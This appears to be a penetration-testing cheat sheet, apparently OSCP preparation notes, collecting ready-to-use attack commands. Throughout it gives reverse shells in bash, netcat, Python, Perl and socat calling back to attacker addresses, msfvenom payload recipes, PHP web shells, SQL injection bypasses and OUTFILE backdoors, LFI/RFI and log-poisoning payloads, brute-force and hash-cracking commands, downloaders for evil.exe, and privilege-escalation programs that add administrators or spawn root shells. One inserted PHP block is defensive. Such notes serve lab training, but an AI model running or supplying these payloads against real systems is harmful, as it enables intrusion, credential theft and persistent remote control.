Useful Payload-2

Some Useful Payloads.

For Taking Notes-

OneNote
KeePass

Preparation through-

HackTheBox
VulnHub
IppSec

Vulnerable Machines-

Kioptrix: Level 1
https://www.vulnhub.com/entry/kioptrix-level-1-1,22/

Kioptrix: Level 1.1
https://www.vulnhub.com/entry/kioptrix-level-11-2,23/

Kioptrix: Level 1.2
https://www.vulnhub.com/entry/kioptrix-level-12-3,24/

Kioptrix: Level 1.3
https://www.vulnhub.com/entry/kioptrix-level-13-4,25/

FristiLeaks: 1.3
https://www.vulnhub.com/entry/fristileaks-13,133/

Stapler: 1
https://www.vulnhub.com/entry/stapler-1,150/

Brainpan: 1
https://www.vulnhub.com/entry/brainpan-1,51/

VulnOS: 2
https://www.vulnhub.com/entry/vulnos-2,147/

SickOs: 1.2
https://www.vulnhub.com/entry/sickos-12,144/

pWnOS: 2.0
https://www.vulnhub.com/entry/pwnos-20-pre-release,34/

Enumeration-

Nmap
Quick TCP Scan
nmap -sC -sV -vv -oA quick 10.10.10.10
Quick UDP Scan
nmap -sU -sV -vv -oA quick_udp 10.10.10.10
Full TCP Scan
nmap -sC -sV -p- -vv -oA full 10.10.10.10
Port knock
for x in 7000 8000 9000; do nmap -Pn --host_timeout 201 --max-retries 0 -p $x 10.10.10.10; done
Web Scanning
Gobuster quick directory busting
gobuster -u 10.10.10.10 -w /usr/share/seclists/Discovery/Web_Content/common.txt -t 80 -a Linux
Gobuster comprehensive directory busting
gobuster -s 200,204,301,302,307,403 -u 10.10.10.10 -w /usr/share/seclists/Discovery/Web_Content/big.txt -t 80 -a 'Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0'
Gobuster search with file extension
gobuster -u 10.10.10.10 -w /usr/share/seclists/Discovery/Web_Content/common.txt -t 80 -a Linux -x .txt,.php
Nikto web server scan
nikto -h 10.10.10.10
Wordpress scan
wpscan -u 10.10.10.10/wp/
Port Checking
Netcat banner grab
nc -v 10.10.10.10 port
Telnet banner grab
telnet 10.10.10.10 port
SMB
SMB Vulnerability Scan
nmap -p 445 -vv --script=smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-ms17-010.nse 10.10.10.10
SMB Users & Shares Scan
nmap -p 445 -vv --script=smb-enum-shares.nse,smb-enum-users.nse 10.10.10.10
Enum4linux
enum4linux -a 10.10.10.10
Null connect
rpcclient -U "" 10.10.10.10
Connect to SMB share
smbclient //MOUNT/share
SNMP
SNMP enumeration
snmp-check 10.10.10.10

Commands

This section includes commands and code I used in the lab environment that I found useful.

Python Servers
Web Server
python -m SimpleHTTPServer 80
FTP Server
# Install pyftpdlib
pip install pyftpdlib

# Run (-w flag allows anonymous write access)
python -m pyftpdlib -p 21 -w
Reverse Shells
Bash shell
bash -i >& /dev/tcp/10.10.10.10/4443 0>&1
Netcat without -e flag
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.10.10 4443 >/tmp/f
Netcat Linux
nc -e /bin/sh 10.10.10.10 4443
Netcat Windows
nc -e cmd.exe 10.10.10.10 4443
Python
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.10.10",4443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Perl
perl -e 'use Socket;$i="10.10.10.10";$p=4443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
Remote Desktop
Remote Desktop to a Windows host with a shared folder and 85% screen size
rdesktop -u username -p password -g 85% -r disk:share=/root/ 10.10.10.10
PHP
PHP command injection from GET Request
<?php echo system($_GET["cmd"]);?>

# Alternative
<?php echo shell_exec($_GET["cmd"]);?>
Powershell
Execute a PowerShell script file non-interactively
powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File file.ps1
Misc
Extend PATH so more binaries are found
export PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/ucb/
Linux proof
hostname && whoami && cat proof.txt && /sbin/ifconfig
Windows proof
hostname && whoami.exe && type proof.txt && ipconfig /all
SSH Tunneling / Pivoting
sshuttle
sshuttle -vvr user@10.10.10.10 10.1.1.0/24
Local port forwarding
ssh <gateway> -L <local port to listen>:<remote host>:<remote port>
Remote port forwarding
ssh <gateway> -R <remote port to bind>:<local host>:<local port>
Dynamic port forwarding
ssh -D <local proxy port> -p <remote port> <target>
Plink local port forwarding
plink -l root -pw pass -R 3389:<localhost>:3389 <remote host>
SQL Injection
# sqlmap crawl
sqlmap -u http://10.10.10.10 --crawl=1

# sqlmap dump database
sqlmap -u http://10.10.10.10 --dbms=mysql --dump

# sqlmap shell
sqlmap -u http://10.10.10.10 --dbms=mysql --os-shell
Upload php command injection file
union all select 1,2,3,4,"<?php echo shell_exec($_GET['cmd']);?>",6 into OUTFILE 'c:/inetpub/wwwroot/backdoor.php'
Load file
union all select 1,2,3,4,load_file("c:/windows/system32/drivers/etc/hosts"),6
Bypasses
' or 1=1 LIMIT 1 --
' or 1=1 LIMIT 1 -- -
' or 1=1 LIMIT 1#
'or 1#
' or 1=1 --
' or 1=1 -- -
Brute force
John the Ripper shadow file
$ unshadow passwd shadow > unshadow.db
$ john unshadow.db
# Hashcat SHA512 $6$ shadow file
hashcat -m 1800 -a 0 hash.txt rockyou.txt --username

# Hashcat MD5 $1$ shadow file
hashcat -m 500 -a 0 hash.txt rockyou.txt --username

# Hashcat MD5 Apache webdav file
hashcat -m 1600 -a 0 hash.txt rockyou.txt

# Hashcat SHA1
hashcat -m 100 -a 0 hash.txt rockyou.txt --force

# Hashcat Wordpress
hashcat -m 400 -a 0 --remove hash.txt rockyou.txt
RDP user with password list
ncrack -vv --user offsec -P passwords rdp://10.10.10.10
SSH user with password list
hydra -l user -P pass.txt -t 10 10.10.10.10 ssh -s 22
FTP user with password list
medusa -h 10.10.10.10 -u user -P passwords.txt -M ftp
MSFVenom Payloads
# PHP reverse shell
msfvenom -p php/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=4443 -f raw -o shell.php

# Java WAR reverse shell
msfvenom -p java/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -f war -o shell.war

# Linux bind shell
msfvenom -p linux/x86/shell_bind_tcp LPORT=4443 -f c -b "\x00\x0a\x0d\x20" -e x86/shikata_ga_nai

# FreeBSD x64 reverse shell
msfvenom -p bsd/x64/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -f elf -o shell.elf

# Linux C reverse shell
msfvenom -p linux/x86/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -e x86/shikata_ga_nai -f c

# Windows non staged reverse shell
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -e x86/shikata_ga_nai -f exe -o non_staged.exe

# Windows Staged (Meterpreter) reverse shell
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=4443 -e x86/shikata_ga_nai -f exe -o meterpreter.exe

# Windows Python reverse shell
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 EXITFUNC=thread -f python -o shell.py

# Windows ASP reverse shell
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -f asp -e x86/shikata_ga_nai -o shell.asp

# Windows ASPX reverse shell
msfvenom -f aspx -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -e x86/shikata_ga_nai -o shell.aspx

# Windows JavaScript reverse shell with nops
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -f js_le -e generic/none -n 18

# Windows Powershell reverse shell
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -e x86/shikata_ga_nai -i 9 -f psh -o shell.ps1

# Windows reverse shell excluding bad characters
msfvenom -p windows/shell_reverse_tcp -a x86 LHOST=10.10.10.10 LPORT=4443 EXITFUNC=thread -f c -b "\x00\x04" -e x86/shikata_ga_nai

# Windows x64 reverse shell
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -f exe -o shell.exe

# Windows reverse shell embedded into plink
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -f exe -e x86/shikata_ga_nai -i 9 -x /usr/share/windows-binaries/plink.exe -o shell_reverse_msf_encoded_embedded.exe

Interactive Shell

Upgrading to a fully interactive TTY using Python
# Enter while in reverse shell
$ python -c 'import pty; pty.spawn("/bin/bash")'

Ctrl-Z

# In Kali
$ stty raw -echo
$ fg

# In reverse shell
$ reset
$ export SHELL=bash
$ export TERM=xterm-256color
$ stty rows <num> columns <cols>

File Transfers

HTTP
The most common file transfer method.
# In Kali
python -m SimpleHTTPServer 80

# In reverse shell - Linux
wget 10.10.10.10/file

# In reverse shell - Windows
powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.10.10.10/file.exe','C:\Users\user\Desktop\file.exe')"
FTP
This process can be tedious; a quick tip is to name the file 'file' on your Kali machine so that you don't have to rewrite the script for multiple file names. You can then rename the file on Windows.
# In Kali
python -m pyftpdlib -p 21 -w

# In reverse shell
echo open 10.10.10.10 > ftp.txt
echo USER anonymous >> ftp.txt
echo ftp >> ftp.txt
echo bin >> ftp.txt
echo GET file >> ftp.txt
echo bye >> ftp.txt

# Execute
ftp -v -n -s:ftp.txt
TFTP
Generic.
# In Kali
atftpd --daemon --port 69 /tftp

# In reverse shell
tftp -i 10.10.10.10 GET nc.exe
VBS
When FTP/TFTP fails you, this wget script in VBS was the go-to on Windows machines.
# In reverse shell
echo strUrl = WScript.Arguments.Item(0) > wget.vbs
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
echo Dim http,varByteArray,strData,strBuffer,lngCounter,fs,ts >> wget.vbs
echo Err.Clear >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs
echo http.Open "GET",strURL,False >> wget.vbs
echo http.Send >> wget.vbs
echo varByteArray = http.ResponseBody >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs
echo Set ts = fs.CreateTextFile(StrFile,True) >> wget.vbs
echo strData = "" >> wget.vbs
echo strBuffer = "" >> wget.vbs
echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs
echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1,1))) >> wget.vbs
echo Next >> wget.vbs
echo ts.Close >> wget.vbs

# Execute
cscript wget.vbs http://10.10.10.10/file.exe file.exe

Buffer Overflow

Offensive Security did a fantastic job in explaining buffer overflows. It is hard at first, but the more you do it the better you understand it. I had re-read the buffer overflow section multiple times and made sure I could do it with my eyes closed in preparation for the exam. The best advice for the exam: triple-check the bad characters; don't just look at the structure, actually step through each character one by one.
# Payload
payload = "\x41" * <length> + <ret_address> + "\x90" * 16 + <shellcode> + "\x43" * <remaining_length>

# Pattern create
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l <length>

# Pattern offset
/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -l <length> -q <address>

# nasm
/usr/share/metasploit-framework/tools/exploit/nasm_shell.rb
nasm > jmp eax

# Bad characters
badchars = (
"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10"
"\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
"\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30"
"\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50"
"\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60"
"\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70"
"\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80"
"\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90"
"\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0"
"\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0"
"\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0"
"\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0"
"\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"
"\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0"
"\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff" )

Privilege Escalation

There are basically two blog posts that are treated as the privilege escalation bible: g0tmi1k's post for Linux and fuzzysecurity's post for Windows.
Offensive Security provided a good balance in the labs: there were definitely unique privilege escalation methods, but there were also a lot of kernel exploits. I developed a habit of running searchsploit on everything, with or without a version number. Don't just skim; actually read the exploits and understand how they work. There were countless times I tried an exploit that failed and moved on, only to realise it was the correct exploit but needed a slight tweak.
The devil is in the details. I was definitely guilty of skimming and missing crucial details such as read and write permissions on /etc/passwd or the sticky bit.
I used three different scripts: LinuxPrivChecker, LinEnum and PowerUp. It is important to remember that these scripts did not always find everything, and manually searching for files is also required.
Kernel exploits were a bit hit and miss; machines are sometimes vulnerable in many different ways. I always thought using a kernel exploit was a bit like cheating, especially dirtyc0w, which is never the intended way. There are two GitHub repositories containing pre-compiled exploits that I found useful: abatchy17's Windows Exploits and lucyoa's kernel exploits.

Scripts

useradd.c
Windows - Add user.
#include <stdlib.h> /* system, NULL, EXIT_FAILURE */

int main(void)
{
  /* Replace <username> and <password> before compiling */
  system("net user <username> <password> /add && net localgroup administrators <username> /add");
  return 0;
}

# Compile
i686-w64-mingw32-gcc -o useradd.exe useradd.c
SUID
Set owner user ID.
#define _GNU_SOURCE   /* needed for setresuid() on glibc */
#include <stdlib.h>   /* system() */
#include <unistd.h>   /* setresuid() */

int main(void){
  setresuid(0, 0, 0);   /* real, effective and saved uid to root when the binary is SUID root */
  system("/bin/bash");
  return 0;
}

# Compile
gcc suid.c -o suid
Powershell Run as
Run file as another user with powershell.
echo $username = '<username>' > runas.ps1
echo $securePassword = ConvertTo-SecureString "<password>" -AsPlainText -Force >> runas.ps1
echo $credential = New-Object System.Management.Automation.PSCredential $username, $securePassword >> runas.ps1
echo Start-Process C:\Users\User\AppData\Local\Temp\backdoor.exe -Credential $credential >> runas.ps1
Process Monitor
Monitor processes to check for running cron jobs.
#!/bin/bash
# Snapshot the process list once a second and print only the lines that
# appeared (>) or disappeared (<); this exposes short-lived cron jobs.

# Split command substitutions on newlines only, not on spaces
IFS=$'\n'

old_process=$(ps -eo command)

while true; do
  new_process=$(ps -eo command)
  # Quote the pattern so the shell does not treat it as a glob
  diff <(echo "$old_process") <(echo "$new_process") | grep -E '^[<>]'
  sleep 1
  old_process=$new_process
done

1-Directory-BruteForcing-

gobuster -w ../../../usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.10.109/sparklays/design/ -x html,php

dirbuster -u http://10.10.10.109/sparklays/ -l ../../../usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt

dirb http://10.10.10.109/sparklays/design/ cewlout -X .html,.php

cewl -w cewlout http://10.10.10.109

Then we’ll use john to transform each word in the wordlist according to the rules in /etc/john/john.conf.

john --wordlist=cewlout --rules --stdout > cewlupdatedout.cewl

2-Enumeration
Filtered / bypass firewall

nmap -A -T5 ip

nmap -g 80 -sV ip    # in case inbound traffic is allowed only to port 80

nmap --script=firewall-bypass ip

3-File-Transfer
curl and wget to download files.

In order not to lose the limited shell, we make the session non-interactive.

TFTP is a UDP-based file transfer protocol. Windows XP through Server 2003 contain the client by default; on Windows 7 and above it has to be installed as an optional feature during Windows setup.
tftp is non-interactive.

Set up a TFTP server on the Kali/attacker machine:
atftpd --daemon --port 69 /tftp    # /tftp is the server directory
cp /usr/share/windows-binaries/nc.exe /tftp/
On the victim machine:
tftp -i <tftpserverip> GET nc.exe    # downloads from the TFTP server


FTP
The Windows ftp client is an interactive program.
ftp /?
ftp -s:filename    (non-interactive way: reads the commands from a file)
apt-get install pure-ftpd    # FTP server
Create a file setup-ftp:
#!/bin/bash
groupadd ftpgroup
useradd -g ftpgroup -d /dev/null -s /etc ftpuser
pure-pw useradd offsec -u ftpuser -d /ftphome
pure-pw mkdb
cd /etc/pure-ftpd/auth/
ln -s ../conf/PureDB 60pdb
mkdir -p /ftphome
chown -R ftpuser:ftpgroup /ftphome/
/etc/init.d/pure-ftpd restart
Make a file with the list of commands (note the space before >, otherwise cmd.exe reads "1>" as a handle redirect and drops the 1 from the port):
echo open 192.168.30.5 21 > ftp.txt
echo offsec >> ftp.txt
echo lab >> ftp.txt
echo bin >> ftp.txt
echo GET evil.exe >> ftp.txt
echo bye >> ftp.txt
ftp -s:ftp.txt
On the victim machine:
copy and paste these commands so that all of them run automatically and the client exits.
VBS script for Windows XP and 2003, PowerShell for Windows 7, 8 and above:
Below is an HTTP downloader script to be pasted into the command line on the target system (it is non-interactive). It is the same wget.vbs script shown under File Transfers / VBS above, built line by line with echo ... >> wget.vbs, and is then run with:
cscript wget.vbs http://192.168.10.5/evil.exe evil.exe    (on the victim machine; downloads from the host location)
POWERSHELL
PowerSploit and Nishang
echo $storageDir = $pwd > wget.ps1
echo $webclient = New-Object System.Net.WebClient >> wget.ps1
echo $url = "http://192.168.10.5/evil.exe" >> wget.ps1
echo $file = "new-exploit.exe" >> wget.ps1
echo $webclient.DownloadFile($url,$file) >> wget.ps1
powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1
File transfer via debug.exe
It is an assembler, disassembler and hex-dumping tool.
File size limit is 64 KB.
cp /usr/share/windows-binaries/nc.exe /var/www
ls -l nc.exe
upx -9 nc.exe    # compression tool to reduce the size further
wine exe2bat.exe nc.exe nc.txt    # exe2bat converts an exe into a text file for file transfer
Copy all text from nc.txt and paste it into the victim's command prompt.
python -m SimpleHTTPServer 1337

4-LFI-RFI
Search for port 80 or any other port running a web server.
If there is a login page, bypass it using SQL injection, then hunt for LFI in the pages.
http://vulnerable_host/preview.php?file=../../../../etc/passwd
==================== 
Useful shells:
<? system('uname -a');?>
<?php echo shell_exec($_GET['e'].' 2>&1'); ?>
shell.php?e=whoami
shell.php?e=pwd
shell.php?e=uname%20-a (I had to URL encode the spaces otherwise my browser thought it should search using google)
shell.php?e=echo%20This%20site%20has%20been%20hacked%3Eindex.html
shell?e=ls%20-l%20/tmp
Null Byte Techniques
vuln.php?page=/etc/passwd
vuln.php?page=/etc/passwd%2500
http://vulnerable_host/preview.php?file=../../../../etc/passwd
http://vulnerable_host/preview.php?file=../../../../etc/passwdjpg
==========================
(In the Documents folder, a Python file is created to look for important Windows files.)
passthru("nc -e /bin/sh <attackerip> <attackerport>");
<?passthru("nc -e /bin/sh <attackerip> <attackerport>");?>
<?passthru(base64_decode("#base64 encoded command > nc -e /bin/sh <attackerip> <attackerport>"));?>
ssh "<?passthru(base64_decode("#base64 encoded command > nc -e /bin/sh <attackerip> <attackerport>"));?>
Method 1: run PHP code through the User-Agent header via Burp Suite.
Method 2: add PHP code to the log files (/var/log/auth.log or the mail log): send the PHP code through a bad SSH request, using the username as the placeholder for the PHP code, or through the mail logs by sending an email.
/proc/self/environ
# This will read the User-Agent data for the shell.
/etc/passwd
# Info on the users of the system
/windows/win.ini
Linux file locations:
– /etc/issue
– /proc/version
– /etc/profile
– /etc/passwd
– /etc/shadow
– /root/.bash_history
– /var/log/dmessage
– /var/mail/root
– /var/spool/cron/crontabs/root
Windows file locations:
– %SYSTEMROOT%\repair\system
– %SYSTEMROOT%\repair\SAM
– %WINDIR%\win.ini
– %SYSTEMDRIVE%\boot.ini
– %WINDIR%\Panther\sysprep.inf
– %WINDIR%\system32\config\AppEvent.Evt
OS X / macOS file locations:
– /etc/fstab
– /etc/master.passwd
– /etc/resolv.conf
– /etc/sudoers
– /etc/sysctl.conf
----------------------------------------------------------------
Remote File Inclusion:
Make a .txt file:
<?php
passthru("nc -e /bin/sh attackerip attackerport");
?>
Make the file accessible to the victim.
On the victim machine request:
?page=http://attackerip/reverse.txt?
// the trailing question mark turns anything the application appends into a query string, so the file is fetched and run as PHP on the victim.
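The include() behind the ?page= and ?file= parameters in this section, as an added example that is not part of the original notes: the vulnerable form beside a hardened allowlist version. The pages/ directory, the page keys and the file names are assumptions for illustration.

```php
<?php
// Added example (not from the original notes): the include() behind a
// "?page=<name>" parameter, vulnerable form beside a hardened form.
// The pages/ directory and the page/file names are assumptions.

// VULNERABLE: the raw parameter reaches include(), so "../../../../etc/passwd",
// a "%00"-terminated name (older PHP) and "http://host/reverse.txt?" all resolve.
function render_page_vulnerable(string $page): void
{
    include($page);
}

// HARDENED: map the parameter onto a fixed allowlist; the raw value never
// touches the filesystem or a URL.
const PAGE_ALLOWLIST = [
    'home'    => 'home.php',
    'about'   => 'about.php',
    'contact' => 'contact.php',
];

function resolve_page(string $page): ?string
{
    // Only short lowercase keys pass; this rejects "../", "/", "\0" (PHP has
    // already decoded "%00" to a NUL byte) and "http://" before any lookup.
    if (!preg_match('/^[a-z]{1,32}$/', $page)) {
        return null;
    }
    if (!array_key_exists($page, PAGE_ALLOWLIST)) {
        return null;
    }
    $base = realpath(__DIR__ . '/pages');
    if ($base === false) {
        return null;
    }
    $path = realpath($base . '/' . PAGE_ALLOWLIST[$page]);
    // realpath() resolves symlinks and "..", so a final prefix check guarantees
    // the file really lives under the pages directory.
    $prefix = $base . DIRECTORY_SEPARATOR;
    if ($path === false || strncmp($path, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $path;
}

function render_page_hardened(string $page): void
{
    $path = resolve_page($page);
    if ($path === null) {
        http_response_code(404);
        echo 'Unknown page';
        return;
    }
    include($path);
}

// Defence in depth belongs in php.ini, not in code: allow_url_include=Off
// (the default) blocks the remote inclusion shown under "Remote File Inclusion",
// and open_basedir limits what include() can reach even if the check above fails.
render_page_hardened($_GET['page'] ?? 'home');
```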
5-RPC Enumeration
showmount -e <IP>
// shows which users are on the system
smtp-user-enum -M VRFY -U /usr/share/wordlists/metasploit/unix_users.txt -t 192.168.78.148
// shows which user recently logged in
for i in $(cat users);do finger $i $i@192.168.78.148;done
// useradd with id 2008
useradd vulnix -u 2008
// the /etc/exports file has the no_root_squash option
cp /bin/bash localshell
chmod 4777 localshell
./localshell -p

6-shell-upgrade
socat:
On Kali (listen):
socat file:'tty',raw,echo=0 tcp-listen:4444
On Victim (launch):
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444
Standalone binaries:
https://github.com/andrew-d/static-binaries
Command injection:
wget -q https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat -O /tmp/socat; chmod +x /tmp/socat; /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444
Download to a writable directory, chmod it and execute it.
-------------------------------------------------------------------------------------------------------------
python -c 'import pty;pty.spawn("/bin/bash")'
ctrl+z (backgrounds the current connection)
# here we can also check echo $TERM to see the xterm-256color response
# we can also run stty -a to see the options
stty raw -echo (raw mode: keys are passed through as they are pressed, without local echo)
fg (brings the shell back to the foreground)
reset (fixes the formatting and reinitializes the terminal)
export TERM=xterm (enables the clear screen option)
7-SQL Injection
Manual SQL injection discovery Tips,Examples,Cheat Sheet :-
https://gerbenjavado.com/manual-sql-injection-discovery-tips/
https://www.hackingarticles.in/manual-sql-injection-exploitation-step-step/
https://www.guru99.com/learn-sql-injection-with-practical-example.html
https://www.veracode.com/security/sql-injection
https://tipstrickshack.blogspot.com/2012/11/how-to-do-sql-injection-manually_7948.html
https://www.hackingloops.com/web-application-penetration-testing-manual-sql-injection/
https://www.cybrary.it/0p3n/howto-manually-sql-injection-using-union-select-method-guide/
http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet
https://portswigger.net/web-security/sql-injection/cheat-sheet
8-ssh
https://vimeo.com/54505525
The Black Magic of SSH
ssh -R *:8080:cort.local:4567 sshtalk.in
or
local="cort.local:4567"
remote="*:8080"
ssh -R ${remote}:${local} sshtalk.in
----------------------------------------------------------------------
local port forwarding:
Accessing the target web server via the proxy machine:
ssh -L <attackerport>:<targetmachineip>:<targetmachineport> ssh@proxyserver
ssh -L 1337:192.168.100.42:80 msfadmin@192.168.100.45
Accessing the target's remote desktop via the proxy machine:
ssh -L <attackerport>:<targetsystemip>:<targetsystemport> ssh@proxy
ssh -L 1337:192.168.100.42:3389 msfadmin@192.168.100.45
rdesktop localhost:1337
---------------------------------------------------
local="localhost:1234"
remote="private-host:443"
ssh -L ${local}:${remote} public-host
------------------------------------------------------
#firesheeping
// In the authorized_keys file we can set a forced command or a restricted shell for sessions that authenticate with that key.
~/.ssh/authorized_keys:
command="echo \"You tried to run ${SSH_ORIGINAL_COMMAND}\"" ssh-rsa <public key>
The private key must not be readable by others: chmod 600 <private key file>
The public key must be readable by others but not writable: chmod 644 <public key file>
plink.exe is a Windows program to create a tunnel via SSH (an SSH client for Windows).
netstat -an|find "LISTEN"    // lists all listening ports
plink -l root -pw ubersecretpassword <attackingmachineip> -R 3390:127.0.0.1:3389
# This connects port 3389 of the victim machine to port 3390 of the attacking machine. This command is run on the victim machine.
# We can check that the tunnel is active with netstat -antp|grep listen
# Port 3390 will be seen as listening there.
We now connect rdesktop to localhost:3390 to get an RDP session to the victim machine.
ssh -D 8080 username@dmzserverip
// this opens a SOCKS proxy on local port 8080 that routes traffic through the DMZ server
// on the attacker machine
Configure proxychains in /etc/proxychains.conf:
add socks4 127.0.0.1 8080
proxychains nmap -p 3389 -sT -Pn 172.16.40.10-22 --open
// searching the internal hidden network for an RDP service on any system
proxychains rdesktop 172.16.40.20

9-Windows Privilege Escalation
https://lolbas-project.github.io/#
https://guif.re/windowseop
icacls /?
takeown /?
check for missing patches
c:\> wmic qfe get Caption,Description,HotFixID,InstalledOn
check for exploits in exploit-db
searchsploit MS16 windows local //from kali
Browser Credentials (enum_ie,enum_chrome,etc.) (metasploit)
Sessiongopher - find stored credentials for putty,winscp,rdp,creds(fireeye)
Hot Potato (foxglovesec)
NBNS spoof,fake WPAD proxy,HTTP>NTLM Relay
PowerUp (@harmj0y)
find hijackable dll, unattended install files,modifiable services,unquoted service paths, AlwaysInstallElevated and more
---------------------------------------------------------------
PowerUp:
On Windows:
net localgroup administrators
powershell.exe -exec bypass
Import-Module ./PowerUp.ps1
Invoke-AllChecks
Write-UserAddMSI    // writes a useradd MSI file that can be run to create a new user
--------------------------------------------------------------------------------------------------------------------------
Port 88 - Kerberos
Kerberos is a protocol that is used for network authentication. Different versions are used by *nix and Windows. But if you see a machine with port 88 open you can be fairly certain that it is a Windows Domain Controller.
If you already have a login to a user of that domain you might be able to escalate that privilege.
Check out: MS14-068
--------------------------------------------------------------------------------------------------------------------------
Connecting with PsExec
If you have credentials you can use psexec to log in easily. You can either use the standalone binary or the Metasploit module.
use exploit/windows/smb/psexec
-------------------------------------------------------------------------------------------------------------------------
Unquoted service path
wmic service get name,pathname,startmode
startmode is auto or manual; findstr /i is case-insensitive, /v excludes the matching lines
wmic service get name,pathname,startmode|findstr /i /v "c:\Windows"|findstr /i /v """
------------------------------------------------------------------------------
findstr /si password *.txt
findstr /si password *.xml
findstr /si password *.ini
#Find all those strings in config files.
dir /s *pass* == *cred* == *vnc* == *.config*
# Find all passwords in all files.
findstr /spin "password" *.*
----------------------------------------------------------------------------------

DIOS (Dump In One Shot) Collection


################AZZATSSINS CYBERSERKERS ################

